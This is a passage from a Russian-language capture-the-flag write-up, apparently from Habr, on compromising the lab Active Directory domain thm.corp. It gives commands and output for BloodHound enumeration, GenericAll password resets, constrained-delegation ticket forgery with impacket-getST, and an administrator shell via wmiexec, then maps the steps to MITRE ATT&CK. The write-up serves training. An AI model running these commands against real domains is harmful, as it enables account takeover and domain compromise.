\u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u0432 \u0434\u043e\u043c\u0435\u043d\u0435, \u043a\u0442\u043e \u043c\u044b \u0438 \u0447\u0442\u043e \u043c\u044b.<\/p>\n<p>\u0417\u0430\u0432\u043e\u0434\u0438\u043c BloodHound \u0438 \u0441\u043e\u0431\u0438\u0440\u0430\u0435\u043c, \u0432\u0441\u0435, \u0447\u0442\u043e \u043c\u043e\u0436\u0435\u043c.<\/p>\n<pre><code>bloodhound-ce-python -d thm.corp -ns 10.114.158.248 \\     -dc thm.corp --zip -c all \\     -u 'TABATHA_BRITT' -p '*******'<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041d\u0430 \u0432\u044b\u0445\u043e\u0434\u0435 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0430\u0440\u0445\u0438\u0432, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c \u0438 \u0441\u043c\u043e\u0442\u0440\u0438\u043c.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/343\/52c\/b77\/34352cb77e470ec6807a0d6a2ab575fb.png\" alt=\"Bloodhound_recon\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/343\/52c\/b77\/34352cb77e470ec6807a0d6a2ab575fb.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/343\/52c\/b77\/34352cb77e470ec6807a0d6a2ab575fb.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>Bloodhound_recon<\/figcaption><\/div>\n<\/figure>\n<p>\u0417\u0434\u0435\u0441\u044c \u0443 \u043d\u0430\u0441 \u043a\u0430\u0440\u0442\u0438\u043d\u0430 \u043f\u0440\u044f\u043c\u043e \u0441\u043a\u0430\u0436\u0435\u043c \u043e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0430\u044f.<\/p>\n<p>\u041f\u0440\u044f\u043c\u043e \u0441\u0435\u0439\u0447\u0430\u0441 \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u0430\u0431\u044c\u044e\u0437\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f SHAWNA_BRAY, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0438\u043c\u0435\u0435\u043c \u043f\u0440\u0430\u0432\u0430 GenericAll, \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043c\u0435\u043d\u044f\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e CRUZ_HALL \u0438 \u0442\u0430\u043a\u043e\u0439 \u0436\u0435 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u043e\u0439 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u0434\u043e\u0441\u0442\u0443\u043f \u0434\u043e DARLA_WINTERS.<\/p>\n<h3>\u0413\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435<\/h3>\n<p>\u0412 Bloodhound \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043e \u043a\u0430\u043a \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043a\u0440\u0435\u0434\u044b \u0434\u043b\u044f \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f.<\/p>\n<pre><code>net rpc password \"SHAWNA_BRAY\" \"newP@ssword2022\" -U \"thm.corp\"\/\"TABATHA_BRITT\"%\"password\" -S \"thm.corp\"<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0417\u0430\u0442\u0435\u043c \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u043c \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u0443 \u0438 \u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u0441\u044f \u043f\u043e\u0434 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c DARLA_WINTERS.<\/p>\n<h3>\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439<\/h3>\n<p>\u0415\u0449\u0435 \u0440\u0430\u0437 \u043d\u0443\u0436\u043d\u043e \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c BloodHound.<\/p>\n<figure class=\"\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2b1\/c10\/999\/2b1c109992a8beea29d1099c37276ce3.png\" alt=\"Constrained_delegation\" sizes=\"(max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/2b1\/c10\/999\/2b1c109992a8beea29d1099c37276ce3.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2b1\/c10\/999\/2b1c109992a8beea29d1099c37276ce3.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>Constrained_delegation<\/figcaption><\/div>\n<\/figure>\n<p>\u041c\u044b \u0432\u0438\u0434\u0438\u043c \u0432 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 Execution Prirvilege &#8212; Constrained Delegation. \u0412 Active Directory delegation \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0441\u0435\u0440\u0432\u0438\u0441\u0443 \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u0434\u0440\u0443\u0433\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.<\/p>\n<p>\u0418\u043c\u0435\u043d\u043d\u043e \u0432 Constrained Delegation \u0441\u0435\u0440\u0432\u0438\u0441 \u043c\u043e\u0436\u0435\u0442 \u0434\u0435\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u0442\u044c TGS \u0442\u043e\u043b\u044c\u043a\u043e \u043a \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0451\u043d\u043d\u044b\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u043c.<\/p>\n<p>\u041d\u0430 \u0447\u0442\u043e \u0435\u0449\u0435 \u043d\u0443\u0436\u043d\u043e \u043e\u0431\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435. Trusted For Constrained Delegation: TRUE \u0438 AllowedToDelegate: cifs\/HayStack.thm.corp. \u042d\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c DARLA_WINTERS \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c Kerberos service tickets \u043a CIFS \u043d\u0430 HAYSTACK \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043b\u044e\u0431\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430.<\/p>\n<p>\u0410 CIFS = SMB.<\/p>\n<p>\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u043e\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u043e\u0442 \u043c\u0438\u0441\u043a\u043e\u043d\u0444\u0438\u0433 \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0431\u0438\u043b\u0435\u0442 \u0430\u0434\u043c\u0438\u043d\u0430.<\/p>\n<pre><code>impacket-getST -spn 'cifs\/haystack.thm.corp' -impersonate Administrator -dc-ip 'thm.corp' 'thm.corp\/DARLA_WINTERS:newP@ssword2022'Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping...[*] Getting TGT for user[*] Impersonating Administrator[*] Requesting S4U2self[*] Requesting S4U2Proxy[*] Saving ticket in Administrator@cifs_haystack.thm.corp@THM.CORP.ccache<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0417\u0434\u0435\u0441\u044c \u043e\u0447\u0435\u043d\u044c \u043b\u0435\u0433\u043a\u043e \u043e\u0448\u0438\u0431\u0438\u0442\u044c\u0441\u044f \u0438 \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u0442\u044c \u043d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 spn. \u041e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0430\u044f \u0441\u0442\u0430\u0442\u044c\u044f \u043d\u0430 \u044d\u0442\u0443 \u0442\u0435\u043c\u0443 <a href=\"https:\/\/blog.deephacking.tech\/en\/posts\/constrained-delegation-y-resource-based-constrained-delegation\/\" rel=\"noopener noreferrer nofollow\">https:\/\/blog.deephacking.tech\/en\/posts\/constrained-delegation-y-resource-based-constrained-delegation\/<\/a><\/p>\n<p>\u0415\u0441\u043b\u0438 \u0443\u043a\u0430\u0437\u0430\u0442\u044c spn \u0431\u0435\u0437 \u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0434\u043e\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u0438\u043c\u0435\u043d\u0438, \u0442\u043e \u0431\u0438\u043b\u0435\u0442 \u0432\u0441\u0435 \u0440\u0430\u0432\u043d\u043e \u0432\u044b\u043f\u0438\u0448\u0435\u0442\u0441\u044f, \u043e\u0434\u043d\u0430\u043a\u043e \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u0442\u0441\u044f \u0443 \u043c\u0435\u043d\u044f \u043d\u0435 \u0432\u044b\u0448\u043b\u043e.<\/p>\n<p>\u0414\u0430\u043b\u0435\u0435 \u0438\u043c\u043f\u043e\u0440\u0442\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u0431\u0438\u043b\u0435\u0442 \u0432 \u0441\u0435\u0441\u0441\u0438\u044e \u0447\u0435\u0440\u0435\u0437 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u0443\u044e KRB5CCNAME.<\/p>\n<pre><code>export KRB5CCNAME=\/tmp\/Administrator@cifs_HAYSTACK@THM.CORP.ccache<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h3>\u041b\u043e\u0433\u0438\u043d\u0438\u043c\u0441\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0438 \u0447\u0438\u0442\u0430\u0435\u043c \u0444\u043b\u0430\u0433\u0438<\/h3>\n<p>\u041e\u0441\u0442\u0430\u043b\u043e\u0441\u044c \u0442\u043e\u043b\u044c\u043a\u043e \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u0442\u044c\u0441\u044f.<\/p>\n<pre><code>impacket-smbexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP\/Administrator@haystack.thm.corp'Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] SMB SessionError: code: 0xc0000034 - STATUS_OBJECT_NAME_NOT_FOUND - The object name is not found.<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041f\u043e\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u0447\u0435\u0440\u0435\u0437 psexec\u2026<\/p>\n<pre><code>impacket-psexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP\/Administrator@haystack.thm.corp' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Requesting shares on haystack.thm.corp.....[*] Found writable share ADMIN$[*] Uploading file rUxIcyGE.exe[*] Opening SVCManager on haystack.thm.corp.....[*] Creating service JSZX on haystack.thm.corp.....[*] Starting service JSZX.....[*] Opening SVCManager on haystack.thm.corp.....[-] Error performing the uninstallation, cleaning up<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0422\u043e\u0436\u0435 \u0431\u043e\u0440\u043e\u0434\u0430.<\/p>\n<p>\u041f\u043e\u0447\u0435\u043c\u0443 wmiexec \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0442\u0430\u043c, \u0433\u0434\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u0442\u0435\u0440\u043f\u044f\u0442 \u043d\u0435\u0443\u0434\u0430\u0447\u0443: smbexec \u0438 psexec \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0441\u043b\u0443\u0436\u0431 Windows \u0447\u0435\u0440\u0435\u0437 \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440 \u0441\u043b\u0443\u0436\u0431, \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0434\u0438\u0441\u043a \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0436\u0438\u0437\u043d\u0435\u043d\u043d\u044b\u043c \u0446\u0438\u043a\u043b\u043e\u043c \u0441\u043b\u0443\u0436\u0431. wmiexec \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0447\u0435\u0440\u0435\u0437 WMI (Windows Management Instrumentation), \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Win32_Process.Create() \u0431\u0435\u0437 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438\u043b\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u044b \u0441\u043b\u0443\u0436\u0431. \u041e\u043d \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u0442\u0438\u0448\u0435, \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043c\u0435\u043d\u044c\u0448\u0435 \u0441\u043b\u0435\u0434\u043e\u0432 \u0434\u043b\u044f \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0438 \u043e\u0431\u0445\u043e\u0434\u0438\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0430 \u0443\u0440\u043e\u0432\u043d\u0435 \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u0435\u0448\u0430\u043b\u0438 \u0434\u0440\u0443\u0433\u0438\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c.<\/p>\n<pre><code>impacket-wmiexec -k -no-pass -dc-ip 'thm.corp' 'THM.CORP\/Administrator@haystack.thm.corp' Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] SMBv3.0 dialect used[!] Launching semi-interactive shell - Careful what you execute[!] Press help for extra shell commandsC:\\&gt;whoamithm\\administrator<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0418 \u0432\u043e\u0442 \u043e\u043d \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u0438\u0434\u0435\u043b\u044c\u043d\u043e.<\/p>\n<p>\u041e\u0441\u0442\u0430\u043b\u043e\u0441\u044c \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0444\u043b\u0430\u0433.<\/p>\n<pre><code>C:\\Users\\Administrator\\Desktop&gt;type root.txtTHM{SOME_FLAG_ROOT_IS_HERE}<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0414\u0430, \u044f \u0437\u0430\u0431\u044b\u043b, \u0447\u0442\u043e \u0435\u0441\u0442\u044c \u0435\u0449\u0435 \u044e\u0437\u0435\u0440 \u0444\u043b\u0430\u0433. \u041e\u043d \u0431\u044b\u043b \u0432 \u043f\u0430\u043f\u043a\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f automate.<\/p>\n<pre><code>C:\\Users\\automate\\Desktop&gt;type user.txtTHM{USER_FLAG_IS_HERE}<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0412\u0438\u0434\u0438\u043c\u043e, \u044f \u043d\u0435 \u043f\u043e\u043d\u044f\u043b \u0437\u0430\u0434\u0443\u043c\u043a\u0443 \u0430\u0432\u0442\u043e\u0440\u0430 \u0438 \u043f\u043e\u0448\u0435\u043b \u043d\u0435 \u0442\u0435\u043c \u043f\u0443\u0442\u0435\u043c, \u043e\u0434\u043d\u0430\u043a\u043e \u044f \u0440\u0435\u0448\u0438\u043b \u0442\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c.<\/p>\n<hr\/>\n<h3>\u0418\u0437\u0432\u043b\u0435\u0447\u0451\u043d\u043d\u044b\u0435 \u0443\u0440\u043e\u043a\u0438<\/h3>\n<ul>\n<li>\n<p>\u0423\u0440\u043e\u043a 1 \u2014 \u0432\u0441\u0435\u0433\u0434\u0430 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443<\/p>\n<\/li>\n<li>\n<p>\u0423\u0440\u043e\u043a 2 \u2014 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c spn, \u0438\u0437-\u0437\u0430 \u043d\u0435\u0433\u043e \u043c\u043e\u0436\u0435\u0442 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u0441\u044f \u0437\u0430\u043b\u043e\u0433\u0438\u043d\u0438\u0442\u044c\u0441\u044f \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443.<\/p>\n<\/li>\n<li>\n<p>\u0423\u0440\u043e\u043a 3 \u2014 \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043e\u0448\u0438\u0431\u043a\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0432 \u043e\u0434\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u0435, \u043d\u0443\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0430\u043b\u044c\u0442\u0435\u0440\u043d\u0430\u0442\u0438\u0432\u043d\u044b\u0435.<\/p>\n<\/li>\n<\/ul>\n<hr\/>\n<h3>MITRE ATT&amp;CK Mapping<\/h3>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<th>\n<p align=\"left\">Phase<\/p>\n<\/th>\n<th>\n<p align=\"left\">Tactic<\/p>\n<\/th>\n<th>\n<p align=\"left\">Technique<\/p>\n<\/th>\n<th>\n<p align=\"left\">ID<\/p>\n<\/th>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Port scanning &amp; AD enumeration<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0007\/\" rel=\"noopener noreferrer nofollow\">Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1046\/\" rel=\"noopener noreferrer nofollow\">Network Service Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1046<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">SMB guest share access<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0007\/\" rel=\"noopener noreferrer nofollow\">Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1135\/\" rel=\"noopener noreferrer nofollow\">Network Share Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1135<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Password from onboarding file<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0006\/\" rel=\"noopener noreferrer nofollow\">Credential Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1552\/001\/\" rel=\"noopener noreferrer nofollow\">Unsecured Credentials: Credentials In Files<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1552.001<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">RID brute-force user enumeration<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0007\/\" rel=\"noopener noreferrer nofollow\">Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1087\/002\/\" rel=\"noopener noreferrer nofollow\">Account Discovery: Domain Account<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1087.002<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Password spraying<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0006\/\" rel=\"noopener noreferrer nofollow\">Credential Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1110\/003\/\" rel=\"noopener noreferrer nofollow\">Brute Force: Password Spraying<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1110.003<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">AS-REP Roasting<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0006\/\" rel=\"noopener noreferrer nofollow\">Credential Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1558\/004\/\" rel=\"noopener noreferrer nofollow\">Steal or Forge Kerberos Tickets: AS-REP Roasting<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1558.004<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Hashcat password cracking<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0006\/\" rel=\"noopener noreferrer nofollow\">Credential Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1110\/002\/\" rel=\"noopener noreferrer nofollow\">Brute Force: Password Cracking<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1110.002<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">BloodHound domain mapping<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0007\/\" rel=\"noopener noreferrer nofollow\">Discovery<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1069\/002\/\" rel=\"noopener noreferrer nofollow\">Permission Groups Discovery: Domain Groups<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1069.002<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">GenericAll password reset chain<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0003\/\" rel=\"noopener noreferrer nofollow\">Persistence<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1098\/\" rel=\"noopener noreferrer nofollow\">Account Manipulation<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1098<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">S4U2self\/S4U2proxy ticket forgery<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0006\/\" rel=\"noopener noreferrer nofollow\">Credential Access<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1558\/\" rel=\"noopener noreferrer nofollow\">Steal or Forge Kerberos Tickets<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1558<\/code><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">Pass-the-Ticket via wmiexec<\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0008\/\" rel=\"noopener noreferrer nofollow\">Lateral Movement<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><a href=\"https:\/\/attack.mitre.org\/techniques\/T1550\/003\/\" rel=\"noopener noreferrer nofollow\">Use Alternate Authentication Material: Pass the Ticket<\/a><\/p>\n<\/td>\n<td>\n<p align=\"left\"><code>T1550.003<\/code><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<blockquote>\n<p>\u0420\u0430\u0439\u0442\u0430\u043f \u043e\u0442 <a href=\"https:\/\/github.com\/alfabuster\" rel=\"noopener noreferrer nofollow\">@alfabuster<\/a><\/p>\n<\/blockquote>\n<\/div>\n<p>\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/1041620\/\">https:\/\/habr.com\/ru\/articles\/1041620\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>reset\u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435\u0413\u043e\u0434\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043d\u0430 \u0442\u0435\u043c\u0443 Windows AD, Kerberos. \u0412 \u043d\u0430\u0447\u0430\u043b\u0435 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c 